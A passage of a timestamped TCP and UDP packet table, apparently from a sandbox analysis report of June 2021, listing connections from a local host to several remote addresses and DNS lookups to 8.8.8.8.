                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.854540110 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.854581118 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.854624033 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.854674101 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.854691029 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.854718924 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.854778051 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.854831934 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.854868889 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.854870081 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.854887009 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.854948997 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.855480909 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.855576992 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.855631113 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.855699062 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.855768919 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.855808020 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.855823994 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.855846882 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.855854034 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.855911016 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.855962038 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.856072903 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.856112957 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.856158972 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.856164932 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.856208086 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.856256962 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.856295109 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.856333971 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.856348991 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.856415987 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.856460094 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.856468916 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.856498003 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.856512070 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:31.858046055 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.052869081 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.052911997 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.052925110 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.052959919 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.053116083 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.053220987 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.053283930 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.053296089 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.053316116 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.053442955 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.053478956 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.053493977 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.053523064 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.053556919 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.053605080 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.053634882 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.053693056 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.053697109 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.053744078 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.053751945 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.053869963 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.053917885 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.053950071 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.054065943 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.054151058 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.054208040 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.054255009 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.054275036 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.054368019 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.054384947 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.054418087 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.054435015 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.054440022 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.054500103 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.054501057 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.054548025 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.054579020 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.054646969 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.054692030 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.054708958 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.054863930 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.054913044 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.055006027 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.055051088 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.055094004 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.055202007 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.055237055 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.055254936 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.055279970 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.055320024 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.055407047 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.055468082 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.055495024 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.055517912 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.055555105 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.055567026 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.055619955 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.055670023 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.055682898 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.055778027 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.646605968 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.646644115 CEST44349735207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:32.646845102 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:57.066569090 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:34:57.230185032 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:57.230297089 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:34:57.299751043 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:34:57.477263927 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:57.477303982 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:57.477413893 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:34:57.480521917 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:34:57.645756006 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:57.717686892 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:34:59.455343008 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:34:59.684319973 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:59.684446096 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:34:59.903235912 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:11.112535954 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:11.336821079 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:11.336992025 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:11.501858950 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:11.547035933 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:11.711200953 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:11.765805960 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:11.831903934 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:12.055334091 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:12.055521965 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:12.274010897 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:14.942603111 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:14.985145092 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:15.150353909 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:15.203528881 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:22.755376101 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:22.973737955 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:22.973985910 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:23.140486956 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:23.188672066 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:23.352550983 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:23.358969927 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:23.688628912 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:23.757689953 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:23.757934093 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:23.852145910 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:24.063667059 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:24.228533983 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:34.412810087 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:34.625811100 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:34.626117945 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:34.792340994 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:34.845895052 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:35.009994030 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:35.025995970 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:35.235001087 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:35.235114098 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:35.453852892 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:44.952752113 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:45.003020048 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:45.166866064 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:45.221874952 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:46.069674969 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:46.293246984 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:46.293638945 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:46.457465887 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:46.503163099 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:46.668042898 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:46.686186075 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:46.899622917 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:46.899848938 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:47.118796110 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:57.724755049 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:57.944024086 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:57.944196939 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:58.109734058 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:58.160404921 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:58.324021101 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:58.330231905 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:58.553769112 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:58.554069042 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:35:58.772185087 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:36:03.693798065 CEST49728443192.168.2.3207.241.224.2
                                                                                                                                                                                                                  Jun 11, 2021 06:36:04.567702055 CEST49729443192.168.2.3207.241.232.198
                                                                                                                                                                                                                  Jun 11, 2021 06:36:04.568037033 CEST49735443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:36:09.333575964 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:36:09.557391882 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:36:09.557687998 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:36:09.721832991 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:36:09.771600008 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:36:09.935693026 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:36:09.937352896 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:36:10.151036024 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:36:10.151165009 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:36:10.369963884 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:36:14.968772888 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:36:15.021115065 CEST497471107192.168.2.3216.230.75.62
                                                                                                                                                                                                                  Jun 11, 2021 06:36:15.185107946 CEST110749747216.230.75.62192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:36:15.239912033 CEST497471107192.168.2.3216.230.75.62

                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  Jun 11, 2021 06:33:52.886456013 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:33:52.936815023 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:33:54.005274057 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:33:54.060467958 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:33:55.149044991 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:33:55.199678898 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:33:56.195935965 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:33:56.249830961 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:33:57.607207060 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:33:57.661653996 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:33:58.875688076 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:33:58.929194927 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.052814960 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.113637924 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.302654982 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.373203039 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.970441103 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:01.023638010 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:02.960165977 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:03.011132002 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:03.998213053 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:04.048971891 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.073461056 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.133929014 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.136739016 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.184410095 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:06.223067999 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:06.284346104 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:07.419682026 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:07.482762098 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:08.592658997 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:08.646105051 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:09.713396072 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:09.764461994 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:10.635119915 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:10.689925909 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:11.569936991 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:11.621920109 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:21.809737921 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:21.880702019 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.730957031 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.794511080 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.659003973 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.723062992 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:26.094538927 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:26.171586037 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:29.830260038 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:29.891926050 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:48.423593044 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:48.484875917 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:51.268249989 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:51.420285940 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:52.042872906 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:52.188497066 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:52.801496983 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:52.817574024 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:52.863476992 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:52.893306017 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:53.325093031 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:53.388535023 CEST53649108.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:53.975155115 CEST5212353192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:54.036981106 CEST53521238.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:55.138559103 CEST5613053192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:55.197886944 CEST53561308.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:55.725730896 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:55.786588907 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:56.619487047 CEST5942053192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:56.679840088 CEST53594208.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:57.957540989 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:58.016989946 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:59.056586981 CEST6397853192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:59.117165089 CEST53639788.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:07.309668064 CEST6293853192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:35:07.370659113 CEST53629388.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:40.151109934 CEST5570853192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:35:40.225353956 CEST53557088.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:41.274629116 CEST5680353192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:35:41.334985971 CEST53568038.8.8.8192.168.2.3

                                                                                                                                                                                                                  DNS Queries

